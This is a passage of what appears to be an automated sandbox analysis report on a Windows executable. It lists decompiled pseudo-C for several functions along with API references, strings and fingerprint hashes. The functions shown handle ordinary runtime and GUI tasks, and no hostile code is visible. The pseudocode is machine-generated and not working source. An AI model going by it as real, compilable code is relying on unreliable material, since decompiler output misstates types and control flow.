				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004297CC();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004297CC();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x42be4e);
				return E00402B14(_v16);
			}

0x0042bcd9
0x0042bcdb
0x0042bce4
0x0042bce7
0x0042bcea
0x0042bcee
0x0042bcf3
0x0042bd00
0x0042bd0a
0x0042bd1a
0x0042bd1a
0x0042bd1f
0x0042bd2b
0x0042bd2e
0x0042bd3c
0x0042bd4a
0x0042bd54
0x0042bd5d
0x0042bd5f
0x0042bd5f
0x0042bd7f
0x0042bd9c
0x0042bd9f
0x0042bda8
0x0042bdad
0x0042bdb2
0x0042bdc8
0x0042bdca
0x0042bdcf
0x0042bdd1
0x0042bdd1
0x0042bde3
0x0042bde8
0x0042bdf2
0x0042bdf8
0x0042bdfd
0x0042be04
0x0042be1c
0x0042be1e
0x0042be23
0x0042be25
0x0042be25
0x0042be2a
0x0042be30
0x0042be33
0x0042be36
0x0042be46

APIs

MulDiv.KERNEL32 ref: 0042BD7A
MulDiv.KERNEL32 ref: 0042BD97
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 0042BDC3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 0042BDE3
DeleteEnhMetaFile.GDI32(00000016), ref: 0042BE04
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 0042BE17

Strings

`, xrefs: 0042BD5F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: afe5ae6a1ebb78d8413ab54d0dc82c03aa184a26d4f5dae321a52fec47e49c4f
Instruction ID: e3d58840c12eccf8fac65368ef228add472a70bfe160740b652eb308043c6d96
Opcode Fuzzy Hash: afe5ae6a1ebb78d8413ab54d0dc82c03aa184a26d4f5dae321a52fec47e49c4f
Instruction Fuzzy Hash: 44411975A00218AFDB00DFA9D885AAEB7F9EF48710F51846AF904E7251E7399D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0046E520, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0046E520(void* __eax, void* __ebx, char __ecx, int __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				long _t53;
				long _t68;
				void* _t73;
				intOrPtr _t77;
				void* _t84;
				intOrPtr _t92;
				void* _t95;
				long _t100;
				long _t101;
				int _t103;
				void* _t107;

				_v40 = 0;
				_v36 = 0;
				_v24 = 0;
				_v8 = __ecx;
				_t103 = __edx;
				_t84 = __eax;
				_push(_t107);
				_push(0x46e68f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t107 + 0xffffffdc;
				if(__edx < 0) {
					L8:
					_pop(_t92);
					 *[fs:eax] = _t92;
					_push(0x46e696);
					E004043FC( &_v40, 2);
					return E004043D8( &_v24);
				}
				_t100 = SendMessageA(E0044D590( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
				_v16 = _t100;
				if(_t100 < 0) {
					_t101 = SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0xbb, _t103 - 1, 0);
					_v16 = _t101;
					if(_t101 < 0) {
						goto L8;
					}
					_t53 = SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0xc1, _v16, 0);
					if(_t53 == 0) {
						goto L8;
					}
					_v16 = _v16 + _t53;
					_v20 = 0x46e6a8;
					L6:
					_v12 = _v16;
					SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0x437, 0,  &_v16);
					_push( &_v24);
					_v32 = _v8;
					_v28 = 0xb;
					_push( &_v32);
					E004045D0( &_v36, _v20);
					_pop(_t95);
					E00409B8C(_v36, 0, _t95);
					_t68 = E00404898(_v24);
					SendMessageA(E0044D590( *((intOrPtr*)(_t84 + 0x10))), 0xc2, 0, _t68);
					_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x10)))) + 0xd0))();
					if(_t73 != E00404698(_v24) + _v12) {
						_t77 =  *0x4bad44; // 0x469640
						E0040656C(_t77, 0,  &_v40);
						E0040CAC4(_v40, 1);
						E00403DEC();
					}
					goto L8;
				}
				_v20 = 0x46e6a0;
				goto L6;
			}

0x0046e52b
0x0046e52e
0x0046e531
0x0046e534
0x0046e537
0x0046e539
0x0046e53d
0x0046e53e
0x0046e543
0x0046e546
0x0046e54b
0x0046e66c
0x0046e66e
0x0046e671
0x0046e674
0x0046e681
0x0046e68e
0x0046e68e
0x0046e567
0x0046e569
0x0046e56e
0x0046e591
0x0046e593
0x0046e598
0x00000000
0x00000000
0x0046e5b2
0x0046e5b9
0x00000000
0x00000000
0x0046e5bf
0x0046e5c7
0x0046e5ca
0x0046e5cd
0x0046e5e4
0x0046e5ec
0x0046e5f0
0x0046e5f3
0x0046e5fa
0x0046e601
0x0046e60b
0x0046e60c
0x0046e614
0x0046e62a
0x0046e634
0x0046e649
0x0046e64e
0x0046e653
0x0046e662
0x0046e667
0x0046e667
0x00000000
0x0046e649
0x0046e575
0x00000000

APIs

SendMessageA.USER32 ref: 0046E562
SendMessageA.USER32 ref: 0046E58C
SendMessageA.USER32 ref: 0046E5B2
SendMessageA.USER32 ref: 0046E5E4
SendMessageA.USER32 ref: 0046E62A

Strings

%s, xrefs: 0046E570
%s, xrefs: 0046E5C2

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: %s$%s
API String ID: 3850602802-919867895
Opcode ID: 8d6ba24e1ae8ce66fbe9985369f8be8777de10353d04a59624603d62fda9e7af
Instruction ID: 6e49c6dbe5183381036b63f531b6c4c870199514b9a82918fec43b96cebc282b
Opcode Fuzzy Hash: 8d6ba24e1ae8ce66fbe9985369f8be8777de10353d04a59624603d62fda9e7af
Instruction Fuzzy Hash: D141E275E10209ABDB00EFA6C881B9E77F8EF48704F50457AF915F7281E779AD008B69

Uniqueness

Uniqueness Score: -1.00%

Function 00424E18, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00424E18(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t55;
				intOrPtr* _t62;
				intOrPtr _t63;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x4bb250; // 0x4bc034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t55 =  *0x4bb044; // 0x417c50
					E0040CBBC(_t53, _t55, 1, __edi, __esi, 0,  &_v24);
					E00403DEC();
				}
				if(_t53 <= 0) {
					E00424DF0();
				} else {
					E00424DFC(_t53);
				}
				_v16 = 0;
				_push(0x4bc86c);
				L00406AC4();
				_push(_t72);
				_push(0x424fa6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x4a05d0, _v16);
				_push(_t72);
				_push(0x424f87);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E00424F8E);
					return E0040360C(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0041C834(_v16, _t55, 0);
						E0041C710(_v16, _t55, 0);
						L00406C2C();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], 0x424f22, _t72,  *[fs:eax], 0x424f51, _t72, 0x4bc86c);
						 *[fs:eax] = 0;
						 *[fs:eax] = 0;
						_push(E00424F58);
						_push(0x4bc86c);
						L00406AC4();
						return 0;
					} else {
						goto L14;
					}
				}
			}

0x00424e19
0x00424e1b
0x00424e1f
0x00424e20
0x00424e21
0x00424e23
0x00424e28
0x00424e30
0x00424e37
0x00424e3a
0x00424e44
0x00424e51
0x00424e56
0x00424e56
0x00424e5d
0x00424e68
0x00424e5f
0x00424e61
0x00424e61
0x00424e6f
0x00424e72
0x00424e77
0x00424e7e
0x00424e7f
0x00424e84
0x00424e87
0x00424e98
0x00424e9d
0x00424e9e
0x00424ea3
0x00424ea6
0x00424ead
0x00424eb8
0x00424ebc
0x00424ebc
0x00424ebc
0x00424ebe
0x00424ec5
0x00424f71
0x00424f73
0x00424f76
0x00424f79
0x00424f86
0x00424ecb
0x00424f6b
0x00424eda
0x00424ee2
0x00424eec
0x00424efc
0x00424f0a
0x00424f15
0x00424f1d
0x00424f3e
0x00424f41
0x00424f46
0x00424f4b
0x00424f50
0x00000000
0x00000000
0x00000000
0x00424f6b

APIs

GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 00424E23
GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 00424E32

Part of subcall function 00424DF0: ResetEvent.KERNEL32(000000D4,00424E6D,?,?,00000000), ref: 00424DF6

RtlEnterCriticalSection.KERNEL32(004BC86C,?,?,00000000), ref: 00424E77
InterlockedExchange.KERNEL32(004A05D0,?), ref: 00424E93
RtlLeaveCriticalSection.KERNEL32(004BC86C,00000000,00424F87,?,00000000,00424FA6,?,004BC86C,?,?,00000000), ref: 00424EEC
RtlEnterCriticalSection.KERNEL32(004BC86C,00424F58,00424F87,?,00000000,00424FA6,?,004BC86C,?,?,00000000), ref: 00424F4B

Strings

P|A, xrefs: 00424E44

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID: P|A
API String ID: 2189153385-296530014
Opcode ID: 250e5b096d0595d0af9feda43fec8f2dbf43211fd40725f0698e0d751449f8a4
Instruction ID: 22ac641c7484cd4b7ae660a6c92a99a3b3625633b4ebdb8e793899e1d6ce66e1
Opcode Fuzzy Hash: 250e5b096d0595d0af9feda43fec8f2dbf43211fd40725f0698e0d751449f8a4
Instruction Fuzzy Hash: DD31A330B04214AFE711EF65E892B6DBBF8EBC9704F938476F400E6691D77D9810CA29

Uniqueness

Uniqueness Score: -1.00%

Function 00401D0C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401D0C() {
				void* _v8;
				intOrPtr* _v12;
				void* _t13;
				void* _t15;
				intOrPtr* _t18;
				void* _t31;
				void* _t37;
				intOrPtr _t42;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t44 = _t46;
				_t47 = _t46 + 0xfffffff8;
				if( *0x4bc5c4 == 0) {
					return _t13;
				} else {
					_push(_t44);
					_push(E00401E00);
					_push( *[fs:eax]);
					 *[fs:eax] = _t47;
					if( *0x4bc04d != 0) {
						_push(0x4bc5cc);
						L00401414();
					}
					 *0x4bc5c4 = 0;
					_t15 =  *0x4bc624; // 0x262b80
					LocalFree(_t15);
					 *0x4bc624 = 0;
					_t18 =  *0x4bc5ec; // 0x2641b4
					_v12 = _t18;
					while(0x4bc5ec != _v12) {
						VirtualFree( *(_v12 + 8), 0, 0x8000);
						_v12 =  *_v12;
					}
					E004014B0(0x4bc5ec);
					E004014B0(0x4bc5fc);
					E004014B0(0x4bc628);
					_t31 =  *0x4bc5e4; // 0x263b80
					_v8 = _t31;
					while(_v8 != 0) {
						 *0x4bc5e4 =  *_v8;
						LocalFree(_v8);
						_t37 =  *0x4bc5e4; // 0x263b80
						_v8 = _t37;
					}
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(0x401e07);
					if( *0x4bc04d != 0) {
						_push(0x4bc5cc);
						L0040141C();
					}
					_push(0x4bc5cc);
					L00401424();
					return 0;
				}
			}

0x00401d0d
0x00401d0f
0x00401d19
0x00401e0a
0x00401d1f
0x00401d21
0x00401d22
0x00401d27
0x00401d2a
0x00401d34
0x00401d36
0x00401d3b
0x00401d3b
0x00401d40
0x00401d47
0x00401d4d
0x00401d54
0x00401d59
0x00401d5e
0x00401d7e
0x00401d71
0x00401d7b
0x00401d7b
0x00401d8d
0x00401d97
0x00401da1
0x00401da6
0x00401dab
0x00401db2
0x00401db9
0x00401dc2
0x00401dc7
0x00401dcc
0x00401dcf
0x00401dd7
0x00401dda
0x00401ddd
0x00401de9
0x00401deb
0x00401df0
0x00401df0
0x00401df5
0x00401dfa
0x00401dff
0x00401dff

APIs

RtlEnterCriticalSection.KERNEL32(004BC5CC,00000000,00401E00), ref: 00401D3B
LocalFree.KERNEL32(00262B80,00000000,00401E00), ref: 00401D4D
VirtualFree.KERNEL32(?,00000000,00008000,00262B80,00000000,00401E00), ref: 00401D71
LocalFree.KERNEL32(00000000,?,00000000,00008000,00262B80,00000000,00401E00), ref: 00401DC2
RtlLeaveCriticalSection.KERNEL32(004BC5CC,00401E07,00262B80,00000000,00401E00), ref: 00401DF0
RtlDeleteCriticalSection.KERNEL32(004BC5CC,00401E07,00262B80,00000000,00401E00), ref: 00401DFA

Strings

dA&, xrefs: 00401D92

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: dA&
API String ID: 3782394904-2347778391
Opcode ID: 149718dd26ade9965b64e7494a6c201eec5fdfc2ef60a3a15d91dc2c956997d4
Instruction ID: 14da7ec355c2a494ff4fb7cee85de43d2df91a33603a8c2a7e85bd41da547308
Opcode Fuzzy Hash: 149718dd26ade9965b64e7494a6c201eec5fdfc2ef60a3a15d91dc2c956997d4
Instruction Fuzzy Hash: 5D212671A04254AFDB21EBA9D9C5B9A7BE4AB08304F1045BBE540A73F1D638B940DB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004300F4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004300F4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x4bc930 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406CD4();
						}
						_t24 = 1;
					}
				} else {
					 *0x4bc914 = E0042FDB8(4, _t23, "GetMonitorInfo",  *0x4bc914, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x004300fd
0x00430100
0x0043010a
0x0043012f
0x00430137
0x00430157
0x0043015c
0x00430167
0x00430172
0x0043017c
0x0043017d
0x0043017e
0x0043017f
0x00430180
0x00430181
0x0043018b
0x0043018d
0x00430195
0x00430196
0x00430196
0x0043019b
0x0043019b
0x0043010c
0x0043011e
0x0043012b
0x0043012b
0x004301a5

APIs

GetMonitorInfoA.USER32(?,?), ref: 00430125
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0043014C
GetSystemMetrics.USER32 ref: 00430161
GetSystemMetrics.USER32 ref: 0043016C
lstrcpy.KERNEL32 ref: 00430196

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

Strings

GetMonitorInfo, xrefs: 0043010C
DISPLAY, xrefs: 0043018D

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: a745b0ea275a56c30d6849e1e9f3efcde2940e5ba8f14c191c69aacad631b9f3
Instruction ID: 2460b0c7709c6b6456444fd34ef3c52d0da8ebf9cf835d26616491e12d2247d4
Opcode Fuzzy Hash: a745b0ea275a56c30d6849e1e9f3efcde2940e5ba8f14c191c69aacad631b9f3
Instruction Fuzzy Hash: 2011D3716013146FEB20CF619CC5BA7B7E8EB49750F00563AED4597250D779A9008BE9

Uniqueness

Uniqueness Score: -1.00%

Function 00438338, Relevance: 12.3, APIs: 8, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00438338(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				struct tagSIZE _v16;
				char _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				signed int _v61;
				char _v65;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				int _t114;
				int _t128;
				int _t133;
				CHAR* _t137;
				int _t147;
				CHAR* _t151;
				signed int _t175;
				signed int _t176;
				void* _t191;
				void* _t206;
				int _t212;
				CHAR* _t216;
				intOrPtr* _t234;
				void* _t235;
				signed int _t249;
				intOrPtr _t254;
				void* _t260;
				void* _t277;
				void* _t281;
				intOrPtr _t286;
				int _t291;
				intOrPtr _t294;
				intOrPtr _t295;

				_t294 = _t295;
				_t235 = 0x11;
				do {
					_push(0);
					_push(0);
					_t235 = _t235 - 1;
				} while (_t235 != 0);
				_push(_t235);
				_t234 = __eax;
				_push(_t294);
				_push(0x4386da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t295;
				_t286 =  *((intOrPtr*)(__eax + 0x208));
				E004293D8(_t286);
				if(E0043373C(E00433634()) == 0) {
					_v8 = E00429334(_t286, 0x4386f0);
					_push( *((intOrPtr*)(_t234 + 0x4c)));
					_push( &_v33);
					_t249 = _v8 >> 1;
					if(__eflags < 0) {
						asm("adc edx, 0x0");
					}
					_t236 =  *((intOrPtr*)(_t234 + 0x48));
					E0041B1E4(0, _t234,  *((intOrPtr*)(_t234 + 0x48)), _t249 - 1);
					__eflags =  *((char*)(_t234 + 0x1a5));
					if(__eflags == 0) {
						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t236, 0xff000006, _t286, _t294, __eflags);
					} else {
						_v33.left = _v33.left + 1;
						_v33.top = _v33.top + 1;
						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t236, 0xff000014, _t286, _t294, __eflags);
						E00429044(_t286,  &_v33);
						OffsetRect( &_v33, 0xffffffff, 0xffffffff);
						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t236, 0xff000010, _t286, _t294, __eflags);
					}
					E00429044(_t286,  &_v33);
					E00446D44(_t234,  &_v108);
					__eflags = _v108;
					if(__eflags != 0) {
						_t114 = E00403814(_t234, __eflags);
						__eflags = _t114;
						if(_t114 != 0) {
							_push(_v8);
							_push( &_v124);
							E00446D44(_t234,  &_v128);
							_push(E00429318( *((intOrPtr*)(_t234 + 0x208)), _v128));
							_pop(_t260);
							_t239 = 0;
							__eflags = 0;
							E0041B1E4(_v33.right - _t260 - 8, _t234, 0, 0);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t286 = _t286;
						} else {
							_t239 = 0;
							E0041B1E4(8, _t234, 0, 0,  &_v33, _v8);
						}
						_t291 = E00449070(_t234, 0x20, __eflags);
						_t128 = _t291 | 0x00000400;
						__eflags = _t128;
						E00446D44(_t234,  &_v132);
						_t133 = E00404698(_v132);
						E00446D44(_t234,  &_v136);
						_t137 = E00404898(_v136);
						DrawTextA(E004294DC(_t286), _t137, _t133,  &_v33, _t128);
						E00428C64( *((intOrPtr*)(_t286 + 0x14)), _t239,  *((intOrPtr*)(_t234 + 0x70)), _t286, _t294, __eflags);
						E00446D44(_t234,  &_v140);
						_t147 = E00404698(_v140);
						E00446D44(_t234,  &_v144);
						_t151 = E00404898(_v144);
						DrawTextA(E004294DC(_t286), _t151, _t147,  &_v33, _t291);
					}
				} else {
					E00446D44(_t234,  &_v84);
					_t298 = _v84;
					if(_v84 == 0) {
						__eflags = 0;
						E0041B1E4(0, _t234, 0, 0,  &_v49, 0);
					} else {
						E00446D44(_t234,  &_v88);
						_t212 = E00404698(_v88);
						E00446D44(_t234,  &_v92);
						_t216 = E00404898(_v92);
						GetTextExtentPoint32A(E004294DC(_t286), _t216, _t212,  &_v16);
						E0041B1E4(0, _t234, _v16.cx, 0,  &_v49, _v16.cy);
						if(E00403814(_t234, _t298) != 0) {
							OffsetRect( &_v49,  *((intOrPtr*)(_t234 + 0x48)) - 8 - _v49.right, 0);
						} else {
							OffsetRect( &_v49, 8, 0);
						}
					}
					 *((intOrPtr*)( *_t234 + 0x44))();
					_t175 = _v49.bottom - _v49.top;
					_t176 = _t175 >> 1;
					if(_t175 < 0) {
						asm("adc eax, 0x0");
					}
					_v61 = _t176;
					ExcludeClipRect(E004294DC(_t286), _v49, _v49.top, _v49.right, _v49.bottom);
					if( *((intOrPtr*)( *_t234 + 0x50))() == 0) {
						_v17 = 0x1c;
					} else {
						_v17 = 0x1b;
					}
					E00433634();
					E004339A0( &_v80, _v17);
					_push( &_v65);
					_push(0);
					_push(E004294DC(_t286));
					_t191 = E00433634();
					_pop(_t277);
					E00433848(_t191,  &_v80, _t277);
					SelectClipRgn(E004294DC(_t286), 0);
					E00446D44(_t234,  &_v96);
					if(_v96 != 0) {
						E00446D44(_t234,  &_v104);
						E00404C30( &_v100, _v104);
						_push(_v100);
						_push( &_v49);
						_push(0);
						_push(0);
						_push(E004294DC(_t286));
						_t206 = E00433634();
						_pop(_t281);
						E0043393C(_t206,  &_v80, _t281);
					}
				}
				_pop(_t254);
				 *[fs:eax] = _t254;
				_push(0x4386e1);
				E004043FC( &_v144, 5);
				E004043FC( &_v108, 2);
				E00404AE4( &_v100);
				return E004043FC( &_v96, 4);
			}

0x00438339
0x0043833b
0x00438340
0x00438340
0x00438342
0x00438344
0x00438344
0x00438347
0x0043834b
0x0043834f
0x00438350
0x00438355
0x00438358
0x0043835b
0x00438366
0x00438377
0x00438505
0x0043850b
0x0043850f
0x00438513
0x00438515
0x00438517
0x00438517
0x0043851b
0x00438520
0x00438525
0x0043852c
0x0043856f
0x0043852e
0x0043852e
0x00438531
0x0043853c
0x00438546
0x00438553
0x00438560
0x00438560
0x00438579
0x00438583
0x00438588
0x0043858c
0x00438598
0x0043859d
0x0043859f
0x004385bc
0x004385c0
0x004385c6
0x004385d9
0x004385dd
0x004385e3
0x004385e5
0x004385e7
0x004385f3
0x004385f4
0x004385f5
0x004385f6
0x004385f7
0x004385a1
0x004385a9
0x004385b2
0x004385b2
0x00438604
0x00438608
0x00438608
0x00438617
0x0043861f
0x0043862d
0x00438638
0x00438646
0x00438651
0x00438663
0x0043866e
0x0043867c
0x00438687
0x00438695
0x00438695
0x0043837d
0x00438382
0x00438387
0x0043838b
0x0043841b
0x0043841d
0x00438391
0x0043839a
0x004383a2
0x004383ad
0x004383b5
0x004383c3
0x004383d7
0x004383e9
0x0043840a
0x004383eb
0x004383f3
0x004383f3
0x004383e9
0x00438429
0x0043842f
0x00438432
0x00438434
0x00438436
0x00438436
0x00438439
0x00438454
0x00438462
0x0043846a
0x00438464
0x00438464
0x00438464
0x0043846e
0x00438479
0x00438481
0x00438482
0x0043848b
0x0043848c
0x00438494
0x00438495
0x004384a4
0x004384ae
0x004384b7
0x004384c2
0x004384cd
0x004384d5
0x004384d9
0x004384da
0x004384dc
0x004384e5
0x004384e6
0x004384ee
0x004384ef
0x004384ef
0x004384b7
0x0043869c
0x0043869f
0x004386a2
0x004386b2
0x004386bf
0x004386c7
0x004386d9

APIs

GetTextExtentPoint32A.GDI32(00000000,00000000,00000000,?), ref: 004383C3
OffsetRect.USER32 ref: 004383F3
OffsetRect.USER32 ref: 0043840A
ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 00438454
SelectClipRgn.GDI32(00000000,00000000), ref: 004384A4

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$ClipOffset$ExcludeExtentPoint32SelectText
String ID:
API String ID: 1219254864-0
Opcode ID: 3fa42aa6e1e4a03af4bad19e63fd9a07babbc805b5dfbbe7ea6ca7ecef49b8b6
Instruction ID: 8bdcfce26607efbdf63c460d1e65f0c50f46bdb3397507f324e35a96c536653a
Opcode Fuzzy Hash: 3fa42aa6e1e4a03af4bad19e63fd9a07babbc805b5dfbbe7ea6ca7ecef49b8b6
Instruction Fuzzy Hash: D3B14871B002049BDB10FBA9CC82ADEB7B9AF49304F50856BF505EB246DA3CDD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404254, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404254(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x4bc04c == 0) {
					if( *0x4a0030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x4bc220 == 0xd7b2 &&  *0x4bc228 > 0) {
						 *0x4bc238();
					}
